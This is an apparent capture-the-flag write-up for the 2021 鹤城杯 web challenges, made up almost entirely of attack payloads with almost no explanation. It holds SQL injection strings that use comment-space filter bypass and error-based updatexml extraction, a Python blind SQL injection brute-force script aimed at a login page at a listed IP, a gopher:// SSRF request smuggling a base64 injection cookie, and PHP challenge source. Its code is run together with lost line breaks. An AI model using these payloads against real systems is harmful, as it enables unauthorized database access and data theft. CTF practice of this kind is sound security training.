2021鹤城杯｜WEB部分WP

http://182.116.62.85:20253/?aaa=%0apass_the_level_1%23

admin[]=1&root_pwd[]=2&level_3={"result":0}

admin'/**/and/**/(('ctf','%s',3,4,5,6)<=/**/(table/**/mysql.innodb_table_stats/**/limit/**/2,1))#

import string
import requestsimport time
req = requests.session()
url = "http://182.116.62.85:26571/login.php"
def hh():    payload = "admin'/**/and/**/(ascii(substr(hex((table/**/fl11aag/**/limit/**/1,1)),%s,1)))=%s#"
    chars = string.printable.replace(".","").replace("?","").replace("`","").replace("+","") + "_{}"
    result = ""
    for i in range(1,100):        for j in range(48,125):            data = {'username':payload%(i,j),'password':"admin"}            rep =  req.post(url,data)            text = rep.text            if "success" in text:                print(j)                result += chr(j)                # print((chr(j)),end="")                # payload = payload%(chr(j-1)+'%s')                print(result)                break
hh()

admin') and updatexml(1,concat(0x7e,(select substr((select flag from flag),1,40))),1)#

gopher://127.0.0.1:80/_POST%20/index.php%20HTTP/1.1%0D%0AHost%3A%20127.0.0.1%0D%0AContent-Type%3A%20application/x-www-form-urlencoded%0D%0ACookie%3A%20this_is_your_cookie%3DYWRtaW4nKSBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBzdWJzdHIoKHNlbGVjdCBmbGFnIGZyb20gZmxhZyksMSw0MCkpKSwxKSM%3D%0D%0AContent-Length%3A%2024%0D%0A%0D%0Auname%3Dadmin%26passwd%3Dadmin%0D%0A

<?phpinclude 'utils.php';
if (isset($_POST['guess'])) {    $guess = (string) $_POST['guess'];    if ($guess === $secret) {        $message = 'Congratulations! The flag is: ' . $flag;    } else {        $message = 'Wrong. Try Again';    }}
if (preg_match('/utils.php/*$/i', $_SERVER['PHP_SELF'])) {    exit("hacker :)");}
if (preg_match('/show_source/', $_SERVER['REQUEST_URI'])){    exit("hacker :)");}
if (isset($_GET['show_source'])) {    highlight_file(basename($_SERVER['PHP_SELF']));    exit();}else{    show_source(__FILE__);}?>